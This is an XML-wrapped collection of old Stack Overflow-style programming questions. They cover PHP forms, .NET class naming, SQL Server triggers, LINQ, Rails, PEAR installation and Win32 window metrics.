    <t xml:space="preserve">&lt;p&gt;I am trying to post an array full of checkboxes and to open it in the next page..&lt;/p&gt;
&lt;p&gt;It only gives me the last result, anyone know why? or how to fix it?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;form name="input" action="createevent.php" method="post"&amp;gt;
Event title: 
&amp;lt;input type="text" name="Eventtitle" size="20"&amp;gt;
&amp;lt;br&amp;gt;Event Description 
&amp;lt;input type="text" name="Description" size="20"&amp;gt;
&amp;lt;br&amp;gt;
Please select the days that you are free to arrange this meeting.&amp;lt;br&amp;gt;
Monday
&amp;lt;input type="checkbox" name="day" value="Monday" /&amp;gt;
&amp;lt;br /&amp;gt;
Tuesday
&amp;lt;input type="checkbox" name="day" value="Tuesday" /&amp;gt;
&amp;lt;br /&amp;gt;
Wednesday
&amp;lt;input type="checkbox" name="day" value="Wednesday" /&amp;gt;
&amp;lt;br /&amp;gt;
Thursday
&amp;lt;input type="checkbox" name="day" value="Thursday" /&amp;gt;
&amp;lt;br /&amp;gt;
Friday
&amp;lt;input type="checkbox" name="day" value="Friday" /&amp;gt;
&amp;lt;br /&amp;gt;
Saturday
&amp;lt;input type="checkbox" name="day" value="Saturday" /&amp;gt;
&amp;lt;br /&amp;gt;
Sunday
&amp;lt;input type="checkbox" name="day" value="Sunday" /&amp;gt;
&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;
&amp;lt;input type="submit" value="Submit"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and no matter how many you select it only gives a single result on the next page.
$day = sizeof($_POST['day']);&lt;/p&gt;
&lt;p&gt;only ever gives '1' answer. And when I get them to the next page I will want to be able to select them separately.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Naming conventions for abstract classes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I distinctly remember that, at one time, the guideline pushed by Microsoft was to add the "Base" suffix to an abstract class to obviate the fact that it was abstract. Hence, we have classes like &lt;code&gt;System.Web.Hosting.VirtualFileBase&lt;/code&gt;, &lt;code&gt;System.Configuration.ConfigurationValidatorBase&lt;/code&gt;, &lt;code&gt;System.Windows.Forms.ButtonBase&lt;/code&gt;, and, of course, &lt;code&gt;System.Collections.CollectionBase&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;But I've noticed that, of late, a lot of abstract classes in the Framework don't seem to be following this convention. For example, the following classes are all abstract but don't follow this convention:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;System.DirectoryServices.ActiveDirectory.DirectoryServer&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;System.Configuration.ConfigurationElement&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;System.Drawing.Brush&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;System.Windows.Forms.CommonDialog&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And that's just what I could drum up in a few seconds. So I went looking up what the official documentation had to say, to make sure I wasn't crazy. I found the &lt;a href="http://msdn.microsoft.com/en-us/library/ms229040.aspx"&gt;Names of Classes, Structs, and Interfaces&lt;/a&gt; on MSDN at &lt;a href="http://msdn.microsoft.com/en-us/library/ms229042.aspx"&gt;Design Guidelines for Developing Class Libraries&lt;/a&gt;. Oddly, I can find no mention of the guideline to add "Base" to the end of an abstract class's name. And the guidelines are no longer available for version 1.1 of the Framework.&lt;/p&gt;
&lt;p&gt;So, am I losing it? Did this guideline ever exist? Has it just been abandoned without a word? Have I been creating long class names all by myself for the last two years for nothing? &lt;/p&gt;
&lt;p&gt;Someone throw me a bone here.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;
I'm not crazy. The guideline existed. &lt;a href="http://blogs.msdn.com/kcwalina/archive/2005/12/16/BaseSuffix.aspx"&gt;Krzysztof Cwalina gripes about it in 2005.&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MVP and UserControls and invocation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having some fun trying to get my head around some MVP stuf, as it pertains to User Controls. I'm using .NET WinForms (or something close to it) and Supervising Controller pattern (well, I think I am :). &lt;/p&gt;
&lt;p&gt;The User Control is itself part of an MVP application (its the View and has an associated Presenter etc). The Presenter is always started first, and it starts the Model(s) and then View(s). The View builds its UI, part of which will be to NEW the UC, which is the View.&lt;/p&gt;
&lt;p&gt;Now the (form) Presenter needs to know about the UC Presenter, but I'm thinking that it doesn't know anything about how the View is composed. The form Presenter doesn't, for instance, know that the UC is part of the form's Controls collection, nor should it.&lt;/p&gt;
&lt;p&gt;Furthermore, the design experience should not be changed; IOW the dev of the View (form) should just be able to select a User Control from the toolbox and drop it on a form.&lt;/p&gt;
&lt;p&gt;So, on to my questions. Firstly, are my assumptions above correct? Somewhat misguided? Messed up? WTF are you thinking? &lt;/p&gt;
&lt;p&gt;Secondly, is it right (enough?) to have the form View invoke the UC View, and the form Presenter invoke the UC Presenter and have some mechanism to tell the UC View what its Presenter is? This breaks my "Presenter first" rule, but I'm not sure how else to do it. &lt;/p&gt;
&lt;p&gt;Any other thoughts, suggestions, comments gladly accepted.&lt;/p&gt;
&lt;p&gt;-- nwahmaet&lt;/p&gt;
</t>
  </si>
  <si>
    <t>why is the iframe contents empty?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to understand this bit of code:&lt;/p&gt;
&lt;p&gt;in display.php:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;
...
&amp;lt;body&amp;gt;
  &amp;lt;table&amp;gt;
     &amp;lt;tr&amp;gt;
       &amp;lt;td&amp;gt;
         User info: &amp;lt;iframe id="SpControlFrame1" name="SpControlFrame1" src="javascript:'';"path_src="index.php?cmd=YYY" &amp;gt;&amp;lt;/iframe&amp;gt;
        &amp;lt;/td&amp;gt;
     &amp;lt;/tr&amp;gt;
   &amp;lt;/table&amp;gt;
 &amp;lt;/body&amp;gt;
 &amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in  another file, I have a switch statement:&lt;/p&gt;
&lt;p&gt;main.php&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;switch ("cmd") {
 case ZZZ:
   include("foo.php");
   break;
 case YYY:
   include("blah.php")
   break;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;blah.php:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
 //some functions for processing
?&amp;gt;
&amp;lt;html&amp;gt;
 &amp;lt;head&amp;gt;
  ...
 &amp;lt;/head&amp;gt;
 &amp;lt;body&amp;gt;
   &amp;lt;input type="text" size="12" name="username"&amp;gt;
   &amp;lt;input type="button" value="submit"&amp;gt;
  &amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;1) So, can some explain what is happening here? The iframe is embedded in the page and doesn't cause a reload or anything like that. &lt;/p&gt;
&lt;p&gt;2) I'm trying to duplicate this functionality on another page but the iframe is always empty (I've verified this using the IE developer Toolbar)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Click Once Setup.exe returns 404 with IIS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Whenever I try to install a Click Once application, I always get a 404 error from the setup.exe file. I've checked the physical folder the web server points to and confirmed that setup.exe exists at the correct location.&lt;/p&gt;
&lt;p&gt;The CO deployment also works fine if I open the web page using file://path/to/index.html&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Cluster - using datasource (local)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using (local) in the connection string doesn't work on my cluster.  I'm assuming it's looking for the default instance on the currently active node instead of the Virtual SQL name.  Anyone know how to make this work?  &lt;/p&gt;
&lt;p&gt;edit note: 
I'd like to use (local) and not localhost - I don't want to change any application generated code.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rails: FasterCSV - Unique Occurences</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have my CSV file imported as such:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;records = FasterCSV.read(path, :headers =&amp;gt; true, :header_converters =&amp;gt; :symbol)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I get the &lt;strong&gt;unique occurences&lt;/strong&gt; of my data?  For instance, here some sample data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ID,Timestamp
test,2008.12.03.20.26.32
test,2008.12.03.20.26.38
test,2008.12.03.20.26.41
test,2008.12.03.20.26.42
test,2008.12.03.20.26.43
test,2008.12.03.20.26.44
cnn,2008.12.03.20.30.37
cnn,2008.12.03.20.30.49
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I simply call &lt;code&gt;records[:id]&lt;/code&gt;, I just get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;testtesttesttesttesttestcnncnn
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to get this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;testcnn
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is the with() construct not included in C#, when it is really cool in VB.NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am C# developer. I really love the curly brace because I came from C, C++ and Java background. However, I also like the other programming languages of the .NET Family such  as VB.NET. Switching back and forth between C# and VB.NET is not really that big of deal if you have been programming for a while in .NET. That is very common approach  in the company where I work.  As C# guy, I really like the XML literal and &lt;code&gt;with&lt;/code&gt; keywords provided by the VB.NET compiler. I wish Microsoft had included those features in C# also. &lt;/p&gt;
&lt;p&gt;I am just curious , what other developer has to say about it!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some good resources to look into synchronizing contact data on mobile devices with a .NET application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Basically we want to be able to somehow synchronize our .NET application's contacts with the contacts on a mobile device (Pocket PC, iPhone, Blackberry, etc)  Preferably a one shot deal that can interface with them all but that doesn't seem likely.  &lt;/p&gt;
&lt;p&gt;Preferably also we're not writing applications (or at least very simple ones) for the mobile devices, but be able to sync with the built-in contacts feature of these devices, both sending from the device to our application and vice versa.  For email we set up our application as an IMAP server and mobile devices can just sync that way and something like that would be ideal, but I suspect such a standard doesn't exist.&lt;/p&gt;
&lt;p&gt;Are there any commercial libraries with a flexible API that allow us to do this?&lt;/p&gt;
&lt;p&gt;In order of preference is PocketPC, iPhone, Blackberry, but info on any of these would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Exclude LIKE items from table</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to figure out how to exclude items from a select statement from table A using an exclusion list from table B. The catch is that I'm excluding based on the prefix of a field.&lt;/p&gt;
&lt;p&gt;So a field value maybe "FORD Muffler" and to exclude it from a basic query I would do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT FieldName 
FROM TableName 
WHERE UPPER(ColumnName) NOT LIKE 'FORD%'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But to use a list of values to exclude from a different tabel I would use a Subquery like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT FieldName 
FROM TableName 
WHERE UPPER(ColumnName) NOT IN (Select FieldName2 FROM TableName2)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that it only excludes exact matches and not LIKE or Wildcards (%).&lt;/p&gt;
&lt;p&gt;How can I accomplish this task? Redesigning the table isn't an option as it is an existing table in use.&lt;/p&gt;
&lt;p&gt;EDIT: Sorry I am using SQL Server (2005).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Render PDF in iTextSharp from HTML with CSS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Any idea how to render a PDF using iTextSharp so that it renders the page using CSS.  The css can either be embedded in the HTML or passed in separately, I don't really care, just want it to work.  &lt;/p&gt;
&lt;p&gt;Specific code examples would be &lt;em&gt;greatly&lt;/em&gt; appreciated.&lt;/p&gt;
&lt;p&gt;Also, I would really like to stick with iTextSharp, though if you do have suggestions for something else, it's got to be free, open source, and have a license that permits using it in commercial software.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does Microsoft's Entity Framework inhibit test driven development?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;MS's entity framework is considered among developers in the agile community to inhibit test driven development.  It was &lt;a href="http://efvote.wufoo.com/forms/ado-net-entity-framework-vote-of-no-confidence/" rel="nofollow"&gt;famously attacked&lt;/a&gt; by an influential group of .Net developers for not being a true reflection of the principles of the agile movement.  &lt;/p&gt;
&lt;p&gt;What are the main drawbacks that an agile developer faces when using the entity framework? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to you inspect or look for .NET attributes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an enumeration for Status for a Task.  Some of the statuses are considered obsolete, and I have marked them as obsolete, as seen below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public enum TaskStatus
{
    [Description("")]
    NotSet = 0,
    Pending = 1,
    Ready = 2,
    Open = 3,
    Completed = 4,
    Closed = 5,
    [Description("On Hold")][Obsolete]
    OnHold = 6,
    [Obsolete]
    Canceled = 7
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In my user interface I populate a drop down with values on the enumerations, but I want to ignore ones that are marked as obsolete.  How would I got about doing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Need a basic audio &amp; video player library in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to display a series of images (perhaps BufferedImages) with variable frame rates as a video, synchronized with uncompressed audio. I also need the basic media controls of play, pause, seek, audio volume, etc.&lt;/p&gt;
&lt;p&gt;Since I don't need to encode, decode, read or write video files, I would prefer to avoid large libraries such as JMF or FMJ. I just need the player. Additionally it would be best to avoid the JNI completely (rules out FMJ), and if the code is open source (rules out JMF).&lt;/p&gt;
&lt;p&gt;In essence, I'm looking for the best practices of how to write a Java movie player, or for a library that has already done it. A good example might be Java-only implementation of an uncompressed AVI video player.&lt;/p&gt;
&lt;p&gt;Some libraries I've looked at besides JMF and FMJ are:
Javid (&lt;a href="http://developer.berlios.de/projects/javid/" rel="nofollow"&gt;http://developer.berlios.de/projects/javid/&lt;/a&gt;), 
javampeg1video (&lt;a href="http://sourceforge.net/projects/javampeg1video/" rel="nofollow"&gt;http://sourceforge.net/projects/javampeg1video/&lt;/a&gt;), java multimedia system (&lt;a href="http://sourceforge.net/projects/jmms/" rel="nofollow"&gt;http://sourceforge.net/projects/jmms/&lt;/a&gt;) and 
javavideoplayer (&lt;a href="http://sourceforge.net/projects/javavideoplayer/" rel="nofollow"&gt;http://sourceforge.net/projects/javavideoplayer/&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;Additional detail:
I have written a Java decoder for a unique audio/video format (Playstation 1 movies). The project is open source (GPL) and I would like it to be as simple and cross platform as possible. Before saving the decoded video with my simple AVI writer, I want to provide the user with a preview of the decoded video. Thus, as stated above, all I need is the video to sync with played audio as it is all decoded in real-time. It almost seems simple, but I'm sure there are various technical issues of real-time playback in Java that I'm not aware of.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Open Source HTML to PDF Renderer with Full CSS Support</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I asked about getting iTextSharp to render a PDF from HTML and a CSS sheet before &lt;a href="http://stackoverflow.com/questions/430280/render-pdf-in-itextsharp-from-html-with-css"&gt;here&lt;/a&gt; but it seems like that may not be possible...  So I guess I will have to try something else.&lt;/p&gt;
&lt;p&gt;Is there an open source .NET/C# library out there that can take HTML &lt;strong&gt;&lt;em&gt;and&lt;/em&gt;&lt;/strong&gt; CSS as input and render it correctly?  &lt;/p&gt;
&lt;p&gt;I must reiterate... the library MUST be free and preferably something with a fairly liberal license.  I'm working with basically no budget here.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP/Apache blocking on each request?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, this may be a dumb question but here goes.  I noticed something the other day when I was playing around with different HTML to PDF converters in PHP.  One I tried (dompdf) took forever to run on my HTML.  Eventually it ran out of memory and ended but while it was still running, none of my other PHP scripts were responsive at all.  It was almost as if that one request was blocking the entire Webserver.&lt;/p&gt;
&lt;p&gt;Now I'm assuming either that can't be right or I should be setting something somewhere to control that behaviour.  Can someone please clue me in?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Prevent mutually recursive execution of triggers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose you have the tables &lt;code&gt;Presentations&lt;/code&gt; and &lt;code&gt;Events&lt;/code&gt;. When a presentation is saved and contains basic event information, such as location and date, an event will be created automatically using a trigger. (I'm afraid it's impossible for technical reasons to simply keep the data at one place and use a view.) In addition, when changing this information later on in the presentation, the trigger will copy the updates over to the event as well, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TRIGGER update_presentations
ON Presentations
AFTER UPDATE
AS
BEGIN
    UPDATE Events
    SET Events.Date = Presentations.Date,
        Events.Location = Presentations.Location
    FROM Presentations INNER JOIN Events ON Presentations.EventID = Events.ID
    WHERE Presentations.ID IN (SELECT ID FROM inserted)
END
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, the customer wants it so that, if a user ever changes the information in the &lt;em&gt;event&lt;/em&gt;, it should go back to the presentation as well. For obvious reasons, I can't do the reverse:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TRIGGER update_events
ON Events
AFTER UPDATE
AS
BEGIN
    UPDATE Presentations
    SET Presentations.Date = Events.Date,
        Presentations.Location = Events.Location
    FROM Events INNER JOIN Presentations ON Events.PresentationID = Presentations.ID
    WHERE Events.ID IN (SELECT ID FROM inserted)
END
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After all, this would cause each trigger to fire after each other. What I could do is add a column &lt;code&gt;last_edit_by&lt;/code&gt; to both tables, containing a user ID. If filled by the trigger with a special invalid ID (say, by making all user IDs of actual persons positive, but user IDs of scripts negative), I could use that as an exit condition:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    AND last_edit_by &amp;gt;= 0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This might work, but what I'd like to do is indicate to the SQL server that, within a transaction, a trigger should only fire once. Is there a way to check this? Or perhaps to check that a table has already been affected by a trigger?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Answer&lt;/strong&gt; thanks to Steve Robbins:&lt;/p&gt;
&lt;p&gt;Just wrap the potentially nested &lt;code&gt;UPDATE&lt;/code&gt; statements in an IF condition checking for &lt;code&gt;trigger_nestlevel()&lt;/code&gt;. For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TRIGGER update_presentations
ON Presentations
AFTER UPDATE
AS
BEGIN
    IF trigger_nestlevel() &amp;lt; 2
        UPDATE Events
        SET Events.Date = Presentations.Date,
            Events.Location = Presentations.Location
        FROM Presentations INNER JOIN Events ON Presentations.EventID = Events.ID
        WHERE Presentations.ID IN (SELECT ID FROM inserted)
END
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note that &lt;code&gt;trigger_nestlevel()&lt;/code&gt; appears to be 1-based, not 0-based. If you want each of the two triggers to execute once, but not more often, just check for &lt;code&gt;trigger_nestlevel() &amp;lt; 3&lt;/code&gt; in both triggers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to query (LINQ) multiple table association link?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have tables association such as (CaseClient is a bridge table):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Cases has many CaseClients&lt;/li&gt;
&lt;li&gt;Client has many CaseClients&lt;/li&gt;
&lt;li&gt;ClientType has many CaseClient&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The easiest way just use the view in database but I heard that with linq you can join this somehow?  Or should I just created view in the database and linq query agains that view?&lt;/p&gt;
&lt;p&gt;I am appreciated your comment&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linux system to manage configurations of servers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a software to manage configurations of linux servers in one central location. It should be able to push changes to servers automaticly. Version control would be an advantage...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the significance of trailing slashes in a namespace URI?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been studying SOAP and WSDL in preparation for implementing a web service.  One thing that I have encountered that puzzles me is that some of the URIs that I have seen use a trailing slash such as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://www.w3.org/some-namespace/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;while other examples that I have studied omit this trailing slash.  I really have several questions regarding this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What is the significance of the trailing slash?&lt;/li&gt;
&lt;li&gt;Is the URI, http://www.w3.org/some-namespace the same as http://www.w3.org/some-namespace/?&lt;/li&gt;
&lt;li&gt;If they are not the same, how do I decide when one form is warranted versus another?&lt;/li&gt;
&lt;li&gt;I have read the guidelines given by w3c regarding URI's and these appear to indicate that that URI should be considered equal only if the case-sensitive comparison of the URI strings are considered equal.  Is this interpretation correct?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Is there an open source C visual debugger for windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an open source C visual debugger for windows?
I have heard about the visual C++ express free edition, but does it have a visual debugger?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Domain Driven Design question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to ask for a reccomended solution for this:
 We have a list of Competitions.
 Each competition has defined fee that a participatior has to pay
We have Participators
I have to know has a Participator that is on a Competition paid the fee or not. I am thinking about 2 solutions and the thing is it has to be the most appropriate solution in Domain Driven Design.
First is to create a Dictionary in Competition instead of a List, the dictionary would have be of type &amp;lt;Participator, bool&amp;gt;.
The secont is perhaps create a different class that has 2 fields, a participator and feePaid. And in Competiton I would have a list of object of that new class.&lt;/p&gt;
&lt;p&gt;Thank you&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Reflection: Getting the fields of a DataRow from a Typed DataSet</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently building a method that takes an object that is of type &lt;code&gt;DataRow&lt;/code&gt; from a typed DataSet, and then returning a string in &lt;a href="http://en.wikipedia.org/wiki/Json" rel="nofollow"&gt;JSON&lt;/a&gt; format of the fields in the DataRow (for use in a Web Service).&lt;/p&gt;
&lt;p&gt;By using &lt;code&gt;System.Reflection&lt;/code&gt;, I am doing something like this : &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public string getJson(DataRow r)
    {
        Type controlType = r.GetType();
        PropertyInfo[] props = controlType.GetProperties();
        foreach (PropertyInfo controlProperty in props)
        {
        }
        return "";
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then in the &lt;code&gt;foreach&lt;/code&gt; statement, I would iterate every field and get the field name and value, and format it into JSON.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;The problem is that when iterating over the &lt;code&gt;props&lt;/code&gt; (of type &lt;code&gt;PropertyInfo[]&lt;/code&gt;), I am getting properties that I do not want to be iterated over:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img88.imageshack.us/img88/2001/datarowreflectionht0.gif" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;As you can see from the above image, I only need the fields that range from &lt;code&gt;0 - 11&lt;/code&gt; in the &lt;code&gt;props&lt;/code&gt; array, because those are the 'real fields' of this particular typed row.&lt;/p&gt;
&lt;p&gt;So my question is, &lt;strong&gt;How can I get the fields of the Typed DataRow only, and not the other 'metadata' ?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;[UPDATE with Solution]&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As &lt;a href="http://stackoverflow.com/questions/431050/c-reflection-getting-the-fields-of-a-datarow-from-a-typed-dataset#431058"&gt;Mehrdad Afshari&lt;/a&gt; suggested, instead of using &lt;code&gt;Reflection&lt;/code&gt;, I am using the &lt;code&gt;Table.Columns&lt;/code&gt; array.  &lt;/p&gt;
&lt;p&gt;Here is the completed function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public string GetJson(DataRow r)
{
    int index = 0;
    StringBuilder json = new StringBuilder();
    foreach (DataColumn item in r.Table.Columns)
    {
        json.Append(String.Format("\"{0}\" : \"{1}\"", item.ColumnName, r[item.ColumnName].ToString()));
        if (index &amp;lt; r.Table.Columns.Count - 1)
        {
            json.Append(", ");
        }
        index++;
    }
    return "{" + json.ToString() + "}";
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Better way of returning the values of a column in Active Record?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Quick one, but thought I'd ask.&lt;/p&gt;
&lt;p&gt;Is there a better way of getting the column values from a model's column than something like this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Item.count(:all, :group =&amp;gt; 'status').reject! { |i, e| i.blank? }.collect { |i,e| i}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Unexpected T_CLONE using Math_Matrix PEAR library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've not used PEAR before, and so I'm probably doing something dumb. I've installed the Math_Matrix library, but when I include it I just get an error. My entire code is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
  $path = '/home/PEAR/Math_Matrix-0.8.0';
  set_include_path(get_include_path() . PATH_SEPARATOR . $path);
  include_once 'Matrix.php';
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The error I get is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Parse error: syntax error, unexpected T_CLONE, expecting T_STRING in /home/PEAR/Math_Matrix-0.8.0/Matrix.php on line 272
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm not really sure what to make of that. I guess the explanations I can think of are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;I've not installed the Math_Matrix library properly (I'm on a shared server which already had PEAR installed on it) or have downloaded the wrong version of it.&lt;/li&gt;
&lt;li&gt;I'm supposed to include something else before I include Matrix.php&lt;/li&gt;
&lt;li&gt;I've included the wrong file (or the right filename but with the wrong path, somehow).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;To install it, I did the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pear install --alldeps channel://pear.phpunit.de/PHPUnit
pear install --alldeps channel://pear.php.net/Math_Vector-0.6.2
pear install Math_Matrix
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Flash upload image resize client side</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone got an ideia on how to get client side image resize using flash.&lt;/p&gt;
&lt;p&gt;Example:
Client chooses an image with 1200x800 and before it uploads it flash will turn it into half of it or something.&lt;/p&gt;
&lt;p&gt;Any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Weird Behavior when using between? method for dates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Open up a Rails console and enter this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;2.weeks.ago.between? 2.weeks.ago, 1.week.ago
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Did it give you true or false? No really, try it a few more times and it will give you different answers.&lt;/p&gt;
&lt;p&gt;Now, I'm thinking that because we're comparing 2.weeks.ago with 2.weeks.ago, the time between evaluating the two statements is causing this behavior.&lt;/p&gt;
&lt;p&gt;I can't say for sure, but I am guessing that the between? method is not inclusive and so if a few milliseconds elapsed between the two statements, the above code will evaluate to true because it will be in between the two dates compared.&lt;/p&gt;
&lt;p&gt;However, if the CPU manages to process this quickly enough such that the time elapsed is ignorable, then it will evaluate to false.&lt;/p&gt;
&lt;p&gt;Can anyone shed some light on this? It is an edge case at best in a system where this might be critical, but it was giving me a headache when my tests passed and failed seemingly at random.&lt;/p&gt;
&lt;p&gt;Oddly enough, this doesn't happen when doing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; Date.yesterday.between? Date.yesterday, Date.tomorrow
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>window border width and height in Win32 - how do I get it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;
      ::GetSystemMetrics (SM_CYBORDER)
&lt;/pre&gt;
&lt;p&gt;...comes back with 1 and I know the title bar is taller than ONE pixel :/&lt;/p&gt;
&lt;p&gt;I also tried:&lt;/p&gt;
&lt;pre&gt;
     RECT r;
      r.left = r.top = 0;   r.right = r.bottom = 400;
      ::AdjustWindowRect (&amp; r, WS_OVERLAPPED, FALSE);
      _bdW = (uword)(r.right - r.left - 400);
      _bdH = (uword)(r.bottom - r.top - 400);
&lt;/pre&gt;
&lt;p&gt;But border w,h came back as 0.&lt;/p&gt;
&lt;p&gt;In my WM_SIZE handler, I need to make sure the window's height changes in
"steps" so, for example a whole new line of text could fit in the window
with no "junky partial line space" at the bottom.&lt;/p&gt;
